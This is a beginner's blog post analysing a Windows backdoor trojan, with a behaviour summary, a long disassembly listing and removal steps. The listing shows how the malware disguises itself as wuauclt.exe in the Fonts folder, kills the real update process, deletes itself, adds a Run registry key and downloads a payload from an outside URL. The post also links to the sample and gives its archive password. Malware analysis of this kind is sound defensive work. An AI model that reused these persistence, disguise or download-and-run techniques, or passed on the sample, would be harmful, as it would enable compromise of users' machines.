一个后门木马的简单分析
菜鸟第一次分析,求大牛指点
下载链接:http://www.cnblogs.com/Joy7/admin/Files.aspx 名字:原样本 解压密码:JoyChou
病毒描述:
运行样本过后,首先病毒提升自身权限
在windows根目录下面生成一个sa.exe目录,并且设置改目录属性为隐藏只读
然后调用cmd和taskkill结束wuauclt.exe进程(Wuauclt.exe是Windows自动升级管理程序,该进程会不断在线检测更新,删除该进程将使计算机无法得到最新更新信息)
接着判断病毒的进程是否来自C:\WINDOWS\Fonts\wuauclt.exe,
如果不是就将病毒原样本拷贝到C:\WINDOWS\Fonts目录下,并且改名为wuauclt.exe(伪装为Windows自动升级管理程序)
如果是则加载系统动态库文件“urlmon.dll”,并调用该库里的"URLDownloadToFileA"函数,连接网络下载病毒文件并保存到C:\WINDOWS\Fonts\gern.fon目录下,
比较该目录文件是否存在,如果不存在则弹出一个消息框退出,如存在则创建多个线程,创建注册表启动项。
行为分析:
1、病毒运行后,会释放以下文件
C:WINDOWS\Fonts\wuauclt.exe
C:WINDOWS\Fonts\gern.fon
2、修改注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\360safe
值: 字符串: "C:\WINDOWS\Fonts\wuauclt.exe"
描述:添加病毒启动项
3、用命令行“cmd /c taskkill /im wuauclt.exe /f”结束“wuauclt.exe”Windows自动升级管理程序进程,被启动后的病毒判断自身进程路径是否来自“\fonts\wuauclt.exe”目录下,如不是则重新创建、如是加载系统动态库文件“urlmon.dll”,并调用该库里的"URLDownloadToFileA"函数,连接网络:http://360.1s.fr/ps.jpg下载病毒文件并保存到"C:\WINDOWS\Fonts\gern.fon"字体库目录下。
4、比较C:\WINDOWS\Fonts\gern.fon该目录文件是否存在,如果不存在则弹出标题为“http”内存为“qq935623508”的消息框然后退出,如果存在则修改注册表并添加开机启动项。
具体分析:
首先:该病毒加了一个UPX的壳,esp定律脱了就是了(好久没脱壳了,差点都不会了,=_=)
提升病毒自身权限 0040214D E8 7EF4FFFF call unpack.004015D0 ; //F7进入如下 004015D3 FF15 54304000 call dword ptr ds:[<&kernel32.GetCurrentProcess>] ; 获取当前病毒进程 004015D9 8D4C24 00 lea ecx,dword ptr ss:[esp] 004015DD 51 push ecx 004015DE 6A 28 push 0x28 004015E0 50 push eax ; 返回的进程伪句柄 004015E1 FF15 10304000 call dword ptr ds:[<&advapi32.OpenProcessToken>] ; advapi32.OpenProcessToken 004015E7 85C0 test eax,eax 004015E9 74 49 je short unpack.00401634 004015EB 8D5424 08 lea edx,dword ptr ss:[esp+0x8] 004015EF 52 push edx 004015F0 68 E47C4000 push unpack.00407CE4 ; ASCII "SeDebugPrivilege" 004015F5 6A 00 push 0x0 004015F7 FF15 14304000 call dword ptr ds:[<&advapi32.LookupPrivilegeValueA>>; advapi32.LookupPrivilegeValueA 004015FD 85C0 test eax,eax 004015FF 74 28 je short unpack.00401629 00401601 8B4C24 00 mov ecx,dword ptr ss:[esp] ; unpack.00402152 00401605 6A 00 push 0x0 00401607 6A 00 push 0x0 00401609 8D4424 0C lea eax,dword ptr ss:[esp+0xC] 0040160D 6A 00 push 0x0 0040160F 50 push eax 00401610 6A 00 push 0x0 00401612 51 push ecx 00401613 C74424 1C 01000>mov dword ptr ss:[esp+0x1C],0x1 0040161B C74424 28 02000>mov dword ptr ss:[esp+0x28],0x2 00401623 FF15 18304000 call dword ptr ds:[<&advapi32.AdjustTokenPrivileges>>; advapi32.AdjustTokenPrivileges 00401629 8B5424 00 mov edx,dword ptr ss:[esp] ; unpack.00402152 0040162D 52 push edx 0040162E FF15 A0304000 call dword ptr ds:[<&kernel32.CloseHandle>] ; kernel32.CloseHandle 00401634 83C4 14 add esp,0x14 00401637 C3 retn //判断病毒自身进程路径是否来自“\fonts\wuauclt.exe”目录下 00402172 FF15 7C304000 call dword ptr ds:[<&kernel32.GetWindows>; 获取windows的目录即C:\WINDOWS 00402178 BF 047D4000 mov edi,unpack.00407D04 ; ASCII "\Fonts\wuauclt.exe" 0040217D 83C9 FF or ecx,-0x1 00402180 33C0 xor eax,eax 00402182 8D95 5CFEFFFF lea edx,dword ptr ss:[ebp-0x1A4] 00402188 F2:AE repne scas byte ptr es:[edi] 0040218A F7D1 not ecx 0040218C 2BF9 sub edi,ecx 0040218E 68 687F4000 push unpack.00407F68 ; ont 即 font文件夹里面的ont,比较用的 00402193 8BF7 mov esi,edi ; ntdll.7C930228 00402195 8BD9 mov ebx,ecx 00402197 8BFA mov edi,edx ; ntdll.KiFastSystemCallRet 00402199 83C9 FF or ecx,-0x1 0040219C F2:AE repne scas byte ptr es:[edi] 0040219E 8BCB mov ecx,ebx 004021A0 4F dec edi ; ntdll.7C930228 004021A1 C1E9 02 shr ecx,0x2 004021A4 F3:A5 rep movs dword ptr es:[edi],dword ptr ds> 004021A6 8BCB mov ecx,ebx 004021A8 8D85 54FCFFFF lea eax,dword ptr ss:[ebp-0x3AC] 004021AE 83E1 03 and ecx,0x3 004021B1 50 push eax 004021B2 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[> 004021B4 E8 27030000 call unpack.004024E0 ; 判断自身进程路径是否来自“C:WINDOWS\fonts\wuauclt.exe”目录下 004021B9 83C4 08 add esp,0x8 004021BC 85C0 test eax,eax 004021BE 0F84 DA010000 je unpack.0040239E ; 如果不是,则跳转。如果是则跳转 如果不是来自C:WINDOWS\Fonts\wuauclt.exe,则跳转,重新创建 0040239E 68 307F4000 push unpack.00407F30 ; 路径C:\sa.exe 004023A3 E8 4E020000 call unpack.004025F6 ; 创建C:\sa.exe目录 004023A8 8B35 88304000 mov esi,dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep 004023AE 83C4 04 add esp,0x4 004023B1 6A 64 push 0x64 004023B3 FFD6 call esi 004023B5 6A 03 push 0x3 ; 属性为:READONLY|HIDDEN 004023B7 68 307F4000 push unpack.00407F30 ; ASCII "C:\sa.exe" 004023BC FF15 9C304000 call dword ptr ds:[<&kernel32.SetFileAtt>; 设置文件夹属性为隐藏 004023C2 8B1D 28304000 mov ebx,dword ptr ds:[<&kernel32.WinExec>; kernel32.WinExec 004023C8 6A 00 push 0x0 004023CA 68 0C7F4000 push unpack.00407F0C ; ASCII "cmd /c taskkill /im wuauclt.exe /f" 004023CF FFD3 call ebx ; 调用cmd和taskkill,结束wuauclt.exe进程 004023D1 68 D0070000 push 0x7D0 004023D6 FFD6 call esi 004023D8 8D8D 5CFEFFFF lea ecx,dword ptr ss:[ebp-0x1A4] 004023DE 6A 00 push 0x0 ; 判断病毒的进程是否来自C:\WINDOWS\Fonts\wuauclt.exe 004023E0 8D95 54FCFFFF lea edx,dword ptr ss:[ebp-0x3AC] 004023E6 51 push ecx ; 复制后的文件:C:\WINDOWS\Fonts\wuauclt.exe 004023E7 52 push edx ; 病毒源文件 004023E8 FF15 50304000 call dword ptr ds:[<&kernel32.CopyFileA>>; 将病毒源文件拷贝到C:\WINDOWS\Fonts\wuauclt.exe 004023EE 68 A00F0000 push 0xFA0 004023F3 FFD6 call esi 004023F5 8D85 5CFEFFFF lea eax,dword ptr ss:[ebp-0x1A4] 004023FB 6A 00 push 0x0 004023FD 50 push eax 004023FE FFD3 call ebx ; 运行wuauclt.exe 00402400 B9 18000000 mov ecx,0x18 00402405 33C0 xor eax,eax 00402407 8DBD 61FFFFFF lea edi,dword ptr ss:[ebp-0x9F] 0040240D C685 60FFFFFF 0>mov byte ptr ss:[ebp-0xA0],0x0 00402414 F3:AB rep stos dword ptr es:[edi] 00402416 66:AB stos word ptr es:[edi] 00402418 AA stos byte ptr es:[edi] 00402419 BF 007F4000 mov edi,unpack.00407F00 ; ASCII "cmd /c del " 0040241E 83C9 FF or ecx,-0x1 00402421 33C0 xor eax,eax 00402423 8D95 60FFFFFF lea edx,dword ptr ss:[ebp-0xA0] 00402429 F2:AE repne scas byte ptr es:[edi] 0040242B F7D1 not ecx 0040242D 2BF9 sub edi,ecx 0040242F 8BC1 mov eax,ecx 00402431 8BF7 mov esi,edi ; ntdll.7C930228 00402433 8BFA mov edi,edx ; ntdll.KiFastSystemCallRet 00402435 C1E9 02 shr ecx,0x2 00402438 F3:A5 rep movs dword ptr es:[edi],dword ptr ds> 0040243A 8BC8 mov ecx,eax 0040243C 83E1 03 and ecx,0x3 0040243F F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[> 00402441 FF15 4C304000 call dword ptr ds:[<&kernel32.GetCommand>; kernel32.GetCommandLineA 00402447 8BF8 mov edi,eax 00402449 83C9 FF or ecx,-0x1 0040244C 33C0 xor eax,eax 0040244E 8D95 60FFFFFF lea edx,dword ptr ss:[ebp-0xA0] 00402454 F2:AE repne scas byte ptr es:[edi] 00402456 F7D1 not ecx 00402458 2BF9 sub edi,ecx 0040245A 50 push eax 0040245B 8BF7 mov esi,edi ; ntdll.7C930228 0040245D 8BFA mov edi,edx ; ntdll.KiFastSystemCallRet 0040245F 8BD1 mov edx,ecx 00402461 83C9 FF or ecx,-0x1 00402464 F2:AE repne scas byte ptr es:[edi] 00402466 8BCA mov ecx,edx ; ntdll.KiFastSystemCallRet 00402468 4F dec edi ; ntdll.7C930228 00402469 C1E9 02 shr ecx,0x2 0040246C F3:A5 rep movs dword ptr es:[edi],dword ptr ds> 0040246E 8BCA mov ecx,edx ; ntdll.KiFastSystemCallRet 00402470 8D85 60FFFFFF lea eax,dword ptr ss:[ebp-0xA0] 00402476 83E1 03 and ecx,0x3 00402479 50 push eax ; cmd /c del "原样本路径" 0040247A F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[> 0040247C FFD3 call ebx ; 调用cmd,删除自身 如果来自C:WINDOWS\Fonts\wuauclt.exe,则修改注册表,创建多线程 004021C4 33C9 xor ecx,ecx 004021C6 8D55 EC lea edx,dword ptr ss:[ebp-0x14] 004021C9 894D ED mov dword ptr ss:[ebp-0x13],ecx 004021CC 52 push edx 004021CD 894D F1 mov dword ptr ss:[ebp-0xF],ecx 004021D0 68 B87D4000 push unpack.00407DB8 ; ASCII "khbced$Zbb" 004021D5 894D F5 mov dword ptr ss:[ebp-0xB],ecx 004021D8 C645 EC 00 mov byte ptr ss:[ebp-0x14],0x0 004021DC 894D F9 mov dword ptr ss:[ebp-0x7],ecx 004021DF 66:894D FD mov word ptr ss:[ebp-0x3],cx 004021E3 884D FF mov byte ptr ss:[ebp-0x1],cl 004021E6 E8 25F1FFFF call unpack.00401310 ; 解密urlmon.dll(khbced$Zbb依次+A) 004021EB 83C4 08 add esp,0x8 004021EE 90 nop //省略很多nop00402216 8D45 EC lea eax,dword ptr ss:[ebp-0x14] 00402219 50 push eax 0040221A FF15 38304000 call dword ptr ds:[<&kernel32.LoadLibraryA>] ; 加载urlmon.dll 00402220 8BD8 mov ebx,eax 00402222 B9 09000000 mov ecx,0x9 00402227 33C0 xor eax,eax 00402229 8D7D C5 lea edi,dword ptr ss:[ebp-0x3B] 0040222C C645 C4 00 mov byte ptr ss:[ebp-0x3C],0x0 00402230 C685 60FFFFFF 0>mov byte ptr ss:[ebp-0xA0],0x0 00402237 F3:AB rep stos dword ptr es:[edi] 00402239 66:AB stos word ptr es:[edi] 0040223B AA stos byte ptr es:[edi] 0040223C B9 18000000 mov ecx,0x18 00402241 33C0 xor eax,eax 00402243 8DBD 61FFFFFF lea edi,dword ptr ss:[ebp-0x9F] 00402249 F3:AB rep stos dword ptr es:[edi] 0040224B 66:AB stos word ptr es:[edi] 0040224D 8D4D C4 lea ecx,dword ptr ss:[ebp-0x3C] 00402250 51 push ecx 00402251 68 A47D4000 push unpack.00407DA4 ; ASCII "KHB:emdbeWZJe<_b[7" 00402256 AA stos byte ptr es:[edi] 00402257 E8 B4F0FFFF call unpack.00401310 ; 解密URLDownLoadTofileA字符串 0040225C 83C4 08 add esp,0x8 0040225F 8D55 C4 lea edx,dword ptr ss:[ebp-0x3C] 00402262 52 push edx 00402263 53 push ebx 00402264 FF15 34304000 call dword ptr ds:[<&kernel32.GetProcAddress>] ; 得到urlmon.dll中函数URLDownLoadTofileA的地址 0040226A A3 D88C4000 mov dword ptr ds:[0x408CD8],eax ; 将地址赋给全局变量0x408CD8 0040226F 8D85 58FDFFFF lea eax,dword ptr ss:[ebp-0x2A8] 00402275 68 04010000 push 0x104 0040227A 50 push eax 0040227B FF15 7C304000 call dword ptr ds:[<&kernel32.GetWindowsDirect>; kernel32.GetWindowsDirectoryA 00402281 BF D47C4000 mov edi,unpack.00407CD4 ; ASCII "\Fonts\gern.fon" 00402286 83C9 FF or ecx,-0x1 00402289 33C0 xor eax,eax 0040228B 8D95 58FDFFFF lea edx,dword ptr ss:[ebp-0x2A8] 00402291 F2:AE repne scas byte ptr es:[edi] 00402293 F7D1 not ecx 00402295 2BF9 sub edi,ecx 00402297 8BF7 mov esi,edi 00402299 8BFA mov edi,edx 0040229B 8BD1 mov edx,ecx 0040229D 83C9 FF or ecx,-0x1 004022A0 F2:AE repne scas byte ptr es:[edi] 004022A2 8BCA mov ecx,edx 004022A4 4F dec edi 004022A5 C1E9 02 shr ecx,0x2 004022A8 F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi] 004022AA 8BCA mov ecx,edx 004022AC 8D85 60FFFFFF lea eax,dword ptr ss:[ebp-0xA0] 004022B2 83E1 03 and ecx,0x3 004022B5 50 push eax 004022B6 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[esi] 004022B8 68 507F4000 push unpack.00407F50 ; ASCII "^jjf0%%),&$'i$\h%fi$`f]" 004022BD E8 4EF0FFFF call unpack.00401310 ; 解密http://360.1s.fr/ps.jpg字符串 004022C2 83C4 08 add esp,0x8 004022C5 8D8D 58FDFFFF lea ecx,dword ptr ss:[ebp-0x2A8] ; C:\WINDOWS\Fonts\gern.fon 004022CB 8D95 60FFFFFF lea edx,dword ptr ss:[ebp-0xA0] ; http://360.1s.fr/ps.jpg 004022D1 6A 00 push 0x0 004022D3 6A 00 push 0x0 004022D5 51 push ecx ; 下载后保存的文件名 004022D6 52 push edx ; 要下载的url地址 004022D7 6A 00 push 0x0 004022D9 FF15 D88C4000 call dword ptr ds:[0x408CD8] ; 调用URLDownloadToFileA函数 但是这个病毒已经很久了,链接已经失效 004022DF 68 10270000 push 0x2710 004022E4 FF15 88304000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep 004022EA 53 push ebx 004022EB FF15 30304000 call dword ptr ds:[<&kernel32.FreeLibrary>] ; 释放urlmon.dll 004022F1 8D85 58FDFFFF lea eax,dword ptr ss:[ebp-0x2A8] 004022F7 50 push eax 004022F8 FF15 2C304000 call dword ptr ds:[<&kernel32.GetFileAttribute>; 获取C:\WINDOWS\Fonts\gern.fon文件夹属性 004022FE 83F8 FF cmp eax,-0x1 ; 判断C:\WINDOWS\Fonts\gern.fon是否存在 00402301 6A 00 push 0x0 00402303 75 1E jnz short unpack.00402323 ; 存在则跳转 00402305 68 487F4000 push unpack.00407F48 ; ASCII "http" 0040230A 68 3C7F4000 push unpack.00407F3C ; ASCII "qq935623508" 0040230F 6A FF push -0x1 00402311 FF15 B0304000 call dword ptr ds:[<&user32.MessageBoxA>] ; user32.MessageBoxA 在C:\WINDOWS\Fonts里不能右键新建,这里我通过cmd命令,cd C:\WINDOWS\Fonts ;md gern.fon; cd gern.fon; 这样就创建成功了,不过还是在Fonts文件夹里看不到,这里我们crtl+F搜索下,就发现了这个文件夹~~ 创建多线程 00402323 8B35 58304000 mov esi,dword ptr ds:[<&kernel32.CreateThread>] ; kernel32.CreateThread 00402329 6A 00 push 0x0 0040232B 6A 00 push 0x0 0040232D 68 801F4000 push unpack.00401F80 00402332 6A 00 push 0x0 00402334 6A 00 push 0x0 00402336 FFD6 call esi ; kernel32.CreateThread 00402338 6A 00 push 0x0 0040233A 6A 00 push 0x0 0040233C 6A 00 push 0x0 0040233E 68 301C4000 push unpack.00401C30 00402343 6A 00 push 0x0 00402345 6A 00 push 0x0 00402347 FFD6 call esi ; kernel32.CreateThread 00402349 6A 00 push 0x0 0040234B 6A 00 push 0x0 0040234D 6A 00 push 0x0 0040234F 68 F0194000 push unpack.004019F0 00402354 6A 00 push 0x0 00402356 6A 00 push 0x0 00402358 FFD6 call esi ; kernel32.CreateThread 0040235A 6A 00 push 0x0 0040235C 6A 00 push 0x0 0040235E 6A 00 push 0x0 00402360 68 40164000 push unpack.00401640 00402365 6A 00 push 0x0 00402367 6A 00 push 0x0 00402369 FFD6 call esi ; kernel32.CreateThread 0040236B 6A 00 push 0x0 0040236D 6A 00 push 0x0 0040236F 6A 00 push 0x0 00402371 68 50174000 push unpack.00401750 00402376 6A 00 push 0x0 00402378 6A 00 push 0x0 0040237A FFD6 call esi ; kernel32.CreateThread 0040237C 6A 00 push 0x0 0040237E 6A 00 push 0x0 00402380 6A 00 push 0x0 00402382 68 701D4000 push unpack.00401D70 00402387 6A 00 push 0x0 00402389 6A 00 push 0x0 0040238B FFD6 call esi ; kernel32.CreateThread 0040238D E8 CEF2FFFF call unpack.00401660 ; 添加病毒启动项 00402392 5F pop edi ; ntdll.7C930228 00402393 5E pop esi ; ntdll.7C930228 00402394 B8 01000000 mov eax,0x1 00402399 5B pop ebx ; ntdll.7C930228 0040239A 8BE5 mov esp,ebp 0040239C 5D pop ebp ; ntdll.7C930228 0040239D C3 retn 添加病毒启动项 00401660 81EC 08010000 sub esp,0x108 00401666 8D4424 00 lea eax,dword ptr ss:[esp] 0040166A 50 push eax 0040166B 68 247D4000 push unpack.00407D24 ; ASCII "Software\Microsoft\Windows\CurrentVersion\policies" 00401670 68 02000080 push 0x80000002 00401675 FF15 20304000 call dword ptr ds:[<&advapi32.RegOpenKeyA>] ; advapi32.RegOpenKeyA 0040167B 85C0 test eax,eax 0040167D 0F85 B7000000 jnz unpack.0040173A 00401683 8B5424 00 mov edx,dword ptr ss:[esp] ; unpack.00402392 00401687 53 push ebx ; urlmon.78130000 00401688 8B1D 04304000 mov ebx,dword ptr ds:[<&advapi32.RegCreateKeyA>] ; 打开注册表Software\Microsoft\Windows\CurrentVersion\policies\explorer 0040168E 55 push ebp 0040168F 56 push esi ; kernel32.CreateThread 00401690 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC] 00401694 57 push edi 00401695 51 push ecx ; kernel32.7C8106A3 00401696 68 187D4000 push unpack.00407D18 ; ASCII "explorer" 0040169B 52 push edx ; ntdll.KiFastSystemCallRet 0040169C FFD3 call ebx ; urlmon.78130000 0040169E 8B2D 08304000 mov ebp,dword ptr ds:[<&advapi32.RegCloseKey>] ; advapi32.RegCloseKey 004016A4 85C0 test eax,eax 004016A6 74 07 je short unpack.004016AF 004016A8 8B4424 10 mov eax,dword ptr ss:[esp+0x10] 004016AC 50 push eax 004016AD FFD5 call ebp 004016AF 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] 004016B3 68 04010000 push 0x104 004016B8 51 push ecx ; kernel32.7C8106A3 004016B9 FF15 7C304000 call dword ptr ds:[<&kernel32.GetWindowsDirectoryA>] ; kernel32.GetWindowsDirectoryA 004016BF BF 047D4000 mov edi,unpack.00407D04 ; ASCII "\Fonts\wuauclt.exe" 004016C4 83C9 FF or ecx,-0x1 004016C7 33C0 xor eax,eax 004016C9 8D5424 14 lea edx,dword ptr ss:[esp+0x14] 004016CD F2:AE repne scas byte ptr es:[edi] 004016CF F7D1 not ecx ; kernel32.7C8106A3 004016D1 2BF9 sub edi,ecx ; kernel32.7C8106A3 004016D3 8BF7 mov esi,edi 004016D5 8BFA mov edi,edx ; ntdll.KiFastSystemCallRet 004016D7 8BD1 mov edx,ecx ; kernel32.7C8106A3 004016D9 83C9 FF or ecx,-0x1 004016DC F2:AE repne scas byte ptr es:[edi] 004016DE 8BCA mov ecx,edx ; ntdll.KiFastSystemCallRet 004016E0 4F dec edi 004016E1 C1E9 02 shr ecx,0x2 004016E4 F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi] 004016E6 8BCA mov ecx,edx ; ntdll.KiFastSystemCallRet 004016E8 8D4424 10 lea eax,dword ptr ss:[esp+0x10] 004016EC 83E1 03 and ecx,0x3 004016EF 50 push eax 004016F0 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[esi] 004016F2 8B4C24 14 mov ecx,dword ptr ss:[esp+0x14] 004016F6 68 007D4000 push unpack.00407D00 ; ASCII "run" 004016FB 51 push ecx ; kernel32.7C8106A3 004016FC FFD3 call ebx ; 新建注册表Software\Microsoft\Windows\CurrentVersion\policies\run 004016FE 8D7C24 14 lea edi,dword ptr ss:[esp+0x14] 00401702 83C9 FF or ecx,-0x1 00401705 33C0 xor eax,eax 00401707 8D5424 14 lea edx,dword ptr ss:[esp+0x14] 0040170B F2:AE repne scas byte ptr es:[edi] 0040170D F7D1 not ecx ; kernel32.7C8106A3 0040170F 51 push ecx ; kernel32.7C8106A3 00401710 52 push edx ; ntdll.KiFastSystemCallRet 00401711 6A 01 push 0x1 00401713 50 push eax 00401714 8B4424 20 mov eax,dword ptr ss:[esp+0x20] 00401718 68 F87C4000 push unpack.00407CF8 ; 新建项为360safe 0040171D 50 push eax ; 值为C:\WINDOWS\Fonts\wuauclt.exe 0040171E FF15 0C304000 call dword ptr ds:[<&advapi32.RegSetValueExA>] ; 添加病毒启动项 00401724 85C0 test eax,eax 00401726 74 07 je short unpack.0040172F 00401728 8B4C24 10 mov ecx,dword ptr ss:[esp+0x10] 0040172C 51 push ecx ; kernel32.7C8106A3 0040172D FFD5 call ebp 0040172F 8B5424 10 mov edx,dword ptr ss:[esp+0x10] 00401733 52 push edx ; ntdll.KiFastSystemCallRet 00401734 FFD5 call ebp 00401736 5F pop edi ; unpack.00402392 00401737 5E pop esi ; unpack.00402392 00401738 5D pop ebp ; unpack.00402392 00401739 5B pop ebx ; unpack.00402392 0040173A 81C4 08010000 add esp,0x108 00401740 C3 retn
清除方案:
首先用杀软360杀毒
貌似不怎么有用
强行删除病毒文件
C:\WINDOWS\Fonts\gern.fon
C:\WINDOWS\Fonts\wuauclt.exe
C:\WINDOWS\sa.exe
删除注册表
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\run\360safe
PS:第一次分析就分析了一个后门的木马,确实很菜很新手很不会,而且还有很多应该还没分析完,以后应该多用IDA分析,OD分析太慢了,忘大牛指点,我也正在学习。